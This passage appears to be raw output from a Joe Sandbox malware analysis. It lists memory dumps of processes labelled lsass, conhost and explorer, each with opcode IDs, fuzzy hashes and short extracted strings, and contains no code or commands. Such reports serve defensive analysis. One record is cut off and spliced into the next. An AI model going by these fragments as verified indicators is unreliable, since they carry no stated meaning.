                                                            • Opcode Fuzzy Hash: 1be6086aa528d5f90d2a626cf513d291d6270380fef2cbf67252e14cb1caee28
                                                            • Instruction Fuzzy Hash: D7313421A0E7890FE7569B3888B51A93BB0EF87200F0941F7D549C71E3DD2C69068791
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.2706677043.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_7ffd348b0000_lsass.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d83cef17d0ede5d2ce077fd8ef555ff4f528d11e3b87086b7ded14c4205d04b
                                                            • Instruction ID: 8afcb72d535c34bc27db804b727408b6b3f156c9aefd964142de33f2da090e0c
                                                            • Opcode Fuzzy Hash: 5d83cef17d0ede5d2ce077fd8ef555ff4f528d11e3b87086b7ded14c4205d04b
                                                            • Instruction Fuzzy Hash: F1412022B0C5290FE714B7FCA0BA2FAB790DF86325B0801BBD14DC7193ED6CA84182C4
                                                            • Instruction Fuzzy Hash: D1A15A21A6F65A06E31D9A1C48E30B573C2EF93606B29537DCEDBC748BDD1C681386C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @ax4$M
                                                            • API String ID: 0-1856302214
                                                            • Opcode ID: 719843f7824242f42356f5a804432637f5d74ba88d4d74e533a6350563ead6c6
                                                            • Instruction ID: d851d56d0d49d61ea5f4faed828ef769bbebd70f609bd4a0eabab7a27c132242
                                                            • Opcode Fuzzy Hash: 719843f7824242f42356f5a804432637f5d74ba88d4d74e533a6350563ead6c6
                                                            • Instruction Fuzzy Hash: 96A1B321B1E94A0FEB98EB6884B66B5B7D1FF96310F0446BAD50DC7283DD2CBC459341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @ax4
                                                            • API String ID: 0-890708349
                                                            • Opcode ID: e146b148f52c97daef2ded6f09549e9ca9854f31da8fb55fcad55f15d6b490e6
                                                            • Instruction ID: 7a2716372fb3c0792d11c0409e8d770954c21781e53bbdedede5c622147e4f23
                                                            • Opcode Fuzzy Hash: e146b148f52c97daef2ded6f09549e9ca9854f31da8fb55fcad55f15d6b490e6
                                                            • Instruction Fuzzy Hash: D571A421B1E94A0FEB98EBA984B63B573D2EF96310F44427AD50DC7283DD6CAC459380
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAy4
                                                            • API String ID: 0-3522526771
                                                            • Opcode ID: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction ID: a7948eb87be0f0529a7c3fba2485c21e84a37e0bc2bc83d6a211baf54d2857f8
                                                            • Opcode Fuzzy Hash: a427ab13864f14b98dd6a39544850d04bb5ee5ea11312724d99568a853c249ad
                                                            • Instruction Fuzzy Hash: A8313821A0E6890FE7969B3888751E93FB0EF87310F0945F7D549C70E3D92CA90697A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: a39d08684b2cb14e18750592956dc910fbef330e3de415f237d3631438909d37
                                                            • Instruction ID: e259c51a475d9347715553e063ece3612859e0be77119767b07b7890002dac3d
                                                            • Opcode Fuzzy Hash: a39d08684b2cb14e18750592956dc910fbef330e3de415f237d3631438909d37
                                                            • Instruction Fuzzy Hash: DFF0656150E7C44FD716973848694557FA0EF6721174A52EEC046CF1A7EA1DCC85C711
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: e2713da73351a736908ee7d02c33d8928c20dd8027455ec5eafd06969740177e
                                                            • Instruction ID: 8a1433d5f0533c36ea8f1adeca120b0081a674ba5ae5132ce5d4c6d7bbc4b052
                                                            • Opcode Fuzzy Hash: e2713da73351a736908ee7d02c33d8928c20dd8027455ec5eafd06969740177e
                                                            • Instruction Fuzzy Hash: C5E0923064F3C08FCB06EA3484A89547FA0EE6720174A52EEC486CF1A3DA2DC88AC701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 1cd2b15bd9cb6d79975f0bec3b6ffa68956861c3c940415b547a8b587f651a7f
                                                            • Instruction ID: 77bd839df359a662b75f7d3bf71f7860d8486d28babe6d1965c5041436dc9ac9
                                                            • Opcode Fuzzy Hash: 1cd2b15bd9cb6d79975f0bec3b6ffa68956861c3c940415b547a8b587f651a7f
                                                            • Instruction Fuzzy Hash: 0CE01A7154F3C04FCB16AB3488768553FA0EE6B21078B41EEC14ACF1B3E62D8849C711
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348c3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 5e51f85ff0d387b4ec77d45699806c37c22464e9266dac9e07d7ddc45da4590c
                                                            • Instruction ID: 3863289434739c7a4ca5fcf1232860b1c845a8c6ef0a832ee2fe3977066e50fd
                                                            • Opcode Fuzzy Hash: 5e51f85ff0d387b4ec77d45699806c37c22464e9266dac9e07d7ddc45da4590c
                                                            • Instruction Fuzzy Hash: A9E01A6154E7C04FCB1AEB74887A8457FA0AE6721078A40EEC14ACF1B3E62DC849C712
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 383c225fbd3be67579f1a8e354bf21850fe743b6956195d3f9ad572fb5ac8c6c
                                                            • Instruction ID: 8b311285287da71433212288cf7cd673102ad56066382f6e6f0fdc2c1b2fb5c5
                                                            • Opcode Fuzzy Hash: 383c225fbd3be67579f1a8e354bf21850fe743b6956195d3f9ad572fb5ac8c6c
                                                            • Instruction Fuzzy Hash: 87E01A7194F7D44FCB06EB7488698447FA0EE6B21178B41EEC146CF1B3E62D8849C701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: a28f3aeead4e25cdc0bbd14db2c927b2818b14a8c51a4d4b1195805721be8802
                                                            • Instruction ID: fdfbd0910cebb5e42ba38f2d06bf7c265dddb8bc8b996cc7b255c5e7697bfe74
                                                            • Opcode Fuzzy Hash: a28f3aeead4e25cdc0bbd14db2c927b2818b14a8c51a4d4b1195805721be8802
                                                            • Instruction Fuzzy Hash: CEE01A7154F7C04FCB4AEB3488698547FB0AE67210B8B41EEC145CF1B3E62E8849C701
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348c3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: b9c0b8045df9e822ac35a273f15009519ae119eddb090cfae96767b524afaefb
                                                            • Instruction ID: 65eb47ef1913af74af1ded87326ffe867afa01ec732c0f24d504631993310b1b
                                                            • Opcode Fuzzy Hash: b9c0b8045df9e822ac35a273f15009519ae119eddb090cfae96767b524afaefb
                                                            • Instruction Fuzzy Hash: 68E0E56154E7C04FCB06EB7488698447FA0AE6721078A40EEC146CB1A3E62D8849C701
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348c3000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 623acd945789a0b901b55929d777d8df6b88f57c4bea64e880565d11e1e431c5
                                                            • Instruction ID: dbd6e4b88af17704ecc72b01b43c4598c621d667195a58a930ec95ef90bf3f43
                                                            • Opcode Fuzzy Hash: 623acd945789a0b901b55929d777d8df6b88f57c4bea64e880565d11e1e431c5
                                                            • Instruction Fuzzy Hash: 8281B431B1890A4FEB94EB68C4A46A9B7E1FF59310F5041BAD10DD7296DF38BC52CB80
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d64b1e9a99e60c8908b0c2c1ca2299a29026dcd75b5203505d92048b5d945aad
                                                            • Instruction ID: be6ba7a5d9426cbd362245376a9d2199f4f675b733cb438d49443af74de588d6
                                                            • Opcode Fuzzy Hash: d64b1e9a99e60c8908b0c2c1ca2299a29026dcd75b5203505d92048b5d945aad
                                                            • Instruction Fuzzy Hash: 9541F222B0C6650BE754BBFCA0F92FAB795DF86325F0804BBD24DC7193DD68A8418284
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 090b401128ba8d2bf89f427d90073ad3d2367c82447a59bc6b2b17e949508e2a
                                                            • Instruction ID: a49b6020cab9802b1819bc79da990f488edd7971b33e9af02879197dbdfa6664
                                                            • Opcode Fuzzy Hash: 090b401128ba8d2bf89f427d90073ad3d2367c82447a59bc6b2b17e949508e2a
                                                            • Instruction Fuzzy Hash: 2B41B662B1A94A4FEB98EB5C94F56F873D2EB9A310F1406B6D50DD3282DD2CAC419740
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84a4ede1672c35442d3275c7f4ea8ac1a0ae78dc6716ebd7eb7c636a6b266ced
                                                            • Instruction ID: 273f06fd278f4d0033bcf77a8b104b5320758c441920e7fcf6a1e75a4bba3096
                                                            • Opcode Fuzzy Hash: 84a4ede1672c35442d3275c7f4ea8ac1a0ae78dc6716ebd7eb7c636a6b266ced
                                                            • Instruction Fuzzy Hash: 0641E322B0C6651FE764B7FC60BA6F9B795DF86321F08447AD14DC7193DD68B8418284
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction ID: b95c0fddba714cae56ebba2eec607c2e8af1ad826bfc272167ce991942ba75b3
                                                            • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                            • Instruction Fuzzy Hash: 26210A3170DC184FE7A8EB0CE889DB973D1EF9A32170105BAE58EC7125E951EC8287C1
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction ID: c72533d5cb17247a87bb1c533d6d5b87f0d4f81b654bc3262004b07077e8c00b
                                                            • Opcode Fuzzy Hash: 07ef623e43e81f330622f2f54a03eb5d4cd6641417e12caa4f84606802083404
                                                            • Instruction Fuzzy Hash: C3312020F0A91A4FEFD4EB2484A57B862D2FF5B700F5400B5D60ED7292DEACAC40A711
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6f2f0b92db2518c1b48ff77366acc73f2d26e6425d2d76d5ec2a585349a0a267
                                                            • Instruction ID: cb6410e8093e593c3c7c78a4f00330763bf83353ae09e048f0972b9413378a4e
                                                            • Opcode Fuzzy Hash: 6f2f0b92db2518c1b48ff77366acc73f2d26e6425d2d76d5ec2a585349a0a267
                                                            • Instruction Fuzzy Hash: BC31B431A0D64A8FDB85EB68C8A5AF977F0FF5A300F0545BAC009D7293DE79A841CB50
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3871dbb7b19d7be7da400875beb962a53041d26216cbf38f3f2c503ef2238502
                                                            • Instruction ID: c23005a755ebf1b0670ed7a6ca1a52fa3bf6b1e2db0b0699cfd65e0acfc57304
                                                            • Opcode Fuzzy Hash: 3871dbb7b19d7be7da400875beb962a53041d26216cbf38f3f2c503ef2238502
                                                            • Instruction Fuzzy Hash: 1B21FC21B199590FE7D8E76C54E96B9B6C6DB9A311F1000BDE60DC33D2DD68AC414251
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction ID: fdab3cff6af208bbab6acc08e01a21042412c9e62ed33bb1b25778f1a9e79b67
                                                            • Opcode Fuzzy Hash: 236cf25825770f7b006d839e398e51a1b2dec7fb2fa10cd83ca1c68d0ad90e9a
                                                            • Instruction Fuzzy Hash: 75212936F0E6599FE712ABB898A10EC7B60EF43321F0441B3D248CB083E97C65469791
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348d1000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce73290fcf8ca2d652c4a4cd191fa3368224d49c3f0918891fd525af61528998
                                                            • Instruction ID: fe48fa3b33e22a50218875c0e7f352a777f44233c37384ad97f087fb915abc8b
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction ID: 034f2f9127c1509428e41563de5c0a43d5071b4447ae523b29c7ff65ba71b807
                                                            • Opcode Fuzzy Hash: 589dbee506358a5312d3161b8f8fc4f4950a70e8b28fdc2b1e26bdaeadf0b41a
                                                            • Instruction Fuzzy Hash: C6C04C05F5B61F01B8957B6E58E60ACA1405BD7714FDD1172D74DD00D1ACCD20D92177
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction ID: b000458af23801af5d7a1d6781a6c87292a975ce16cbf5cab5fe5ffb1a1b6739
                                                            • Opcode Fuzzy Hash: 77ad4d031cf475bb47d04fe4c5aaf9db597bb29844311aba93be73394404c860
                                                            • Instruction Fuzzy Hash: 95C08C305118098FC988EB28C88480433A0FB0A300BC10090E408C7170D25ADCC1D781
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 694a6ff74643480b845759cb43dad0d6f047f0242a54711fb743fa187c037cdf
                                                            • Instruction ID: 2dcc27fd492da1d85c39c56db41f0e37b2fad65d69696017452e89b0fabc2080
                                                            • Opcode Fuzzy Hash: 694a6ff74643480b845759cb43dad0d6f047f0242a54711fb743fa187c037cdf
                                                            • Instruction Fuzzy Hash: 3CC08C01F0C82642F3E4228400302BD04064F84300F484034E20DE73CACD6C6D0102C6
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction ID: b227916acbea63441ba49516ee55eaf2e04fb610f2ad6c6872f37c3405b7b73b
                                                            • Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
                                                            • Instruction Fuzzy Hash: F2B01200E6740F00A488377E08E206470405B47200FC810B0D70DC008198CD20982263
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction ID: 970184ef5f453681c824ba3ee8f1bfc658b3069047c65a3a19f2bf84c4be51f5
                                                            • Opcode Fuzzy Hash: 350e4c440bf0bd8d4b3de66a8fac49de3d4a54a9e89d423a277505f99fd2c13a
                                                            • Instruction Fuzzy Hash: 20C02B30F0E01C40E7A4473048510FA32014F43304F0D41F1810AF7082CC3C18003120
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001B.00000002.2794311233.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_27_2_7ffd348a0000_conhost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction ID: 1aa783e87f7f83d51ef045af4f10062e2c7bb6e07b19927c41d851be2c32a240
                                                            • Opcode Fuzzy Hash: 651fb85edec2241e8e4f2d646c03ce2ff3bc321c37d5575cfa5b4b1e7fe45f73
                                                            • Instruction Fuzzy Hash: 54418F07B0956267E12137FD75711EEABA88F82379B0C5677E24CDA0C3ACB8748582E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            • Opcode ID: 9c5009e042b39d0d92390fe1c20e4ae3ed8882c838e00cb770ffffd912156729
                                                            • Instruction ID: 99db729712a96a56c8ce7dcc03ce44bb2dc77d58bbb3598897986ac65d5913da
                                                            • Opcode Fuzzy Hash: 9c5009e042b39d0d92390fe1c20e4ae3ed8882c838e00cb770ffffd912156729
                                                            • Instruction Fuzzy Hash: 1C91E575A18A894FE799DBAC88B93A97FE1FF96314F0401BEC149D72D2CB796811C340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HAx4
                                                            • API String ID: 0-3371061106
                                                            • Opcode ID: 1a8b4229c3e9811427d88b22b70b7dacc3a7c469e428222fb842d2a8d3fd57fa
                                                            • Instruction ID: d8e9bbce5d6d5e7a0ed28f439d3dd366817fb54bae4eb09be2a8a4a0466d7e82
                                                            • Opcode Fuzzy Hash: 1a8b4229c3e9811427d88b22b70b7dacc3a7c469e428222fb842d2a8d3fd57fa
                                                            • Instruction Fuzzy Hash: 48312621A0DA890FE7569B3888751A97FB1EF87210F0941F7D549C71E3ED2C69069781
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6b16834579cfd37e7c1b31bf0f8b13d7839bd2f7e208e3524b1d87fab4ad7a3
                                                            • Instruction ID: 3d6ec788da90c8ca7bbfc8d56ff3e329eccd4eccc8f29abd3b92409cf852ecb9
                                                            • Opcode Fuzzy Hash: d6b16834579cfd37e7c1b31bf0f8b13d7839bd2f7e208e3524b1d87fab4ad7a3
                                                            • Instruction Fuzzy Hash: 3B410422B1C9661BE754B7FCA0F92FE7B91DF86325B0804BFD14DC7193DD28A8418284
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd185d822cb6123088ed5a3b1781b92f97e38a5cb1a91f945b05e1a528612453
                                                            • Instruction ID: e8ee9b5c01e14034920442c32f4821162fbe2341a5058b4c644aa2e3a96bd049
                                                            • Opcode Fuzzy Hash: fd185d822cb6123088ed5a3b1781b92f97e38a5cb1a91f945b05e1a528612453
                                                            • Instruction Fuzzy Hash: A1411322B1CA661FE718B7FCA0BA6F97B91EF85325B08047AD10DC7193DD28B8418284
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f7b48fb1645722d62dc5b79b0a7f16b485012c1d121dfbc5daa147e74b11fe7
                                                            • Instruction ID: 84d065431b6238741b8624aeadf420d18c62c6a80688c06adf7a7c388da02e71
                                                            • Opcode Fuzzy Hash: 2f7b48fb1645722d62dc5b79b0a7f16b485012c1d121dfbc5daa147e74b11fe7
                                                            • Instruction Fuzzy Hash: 3E21D83130CC184FE768EB5CE889DB977D1EF9A32171501BAE58EC7265E915EC8287C1
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b08881d1e9328da80f73801fb315f880e26def6e2356d4c289539a1d48309e1
                                                            • Instruction ID: 1d63c0663c573cd9d3822c518b54690657afe8b523c1ad10fa1abd7cebecfa83
                                                            • Opcode Fuzzy Hash: 4b08881d1e9328da80f73801fb315f880e26def6e2356d4c289539a1d48309e1
                                                            • Instruction Fuzzy Hash: BF314E21B0CE1A8FEBD5EB6884A57B86A91FF5B700F5000B5D60ED7292DE2CAC40A701
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6afa570bb65993b50dd73d0d3c2d1d909ba2f776c06ec32b7c9e8b5637a0c99f
                                                            • Instruction ID: 320f85aa60bd101ceb5a2b097a66472045d96773efe9dc1fc7908424eeb5a5a5
                                                            • Opcode Fuzzy Hash: 6afa570bb65993b50dd73d0d3c2d1d909ba2f776c06ec32b7c9e8b5637a0c99f
                                                            • Instruction Fuzzy Hash: 2031A431A0C94A9FEB45EB68C8A59F97BF1FF5A310B0445BAC009D71A2DF38A941CB40
                                                            Memory Dump Source
                                                            • Source File: 0000001C.00000002.2875377710.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_28_2_7ffd34890000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
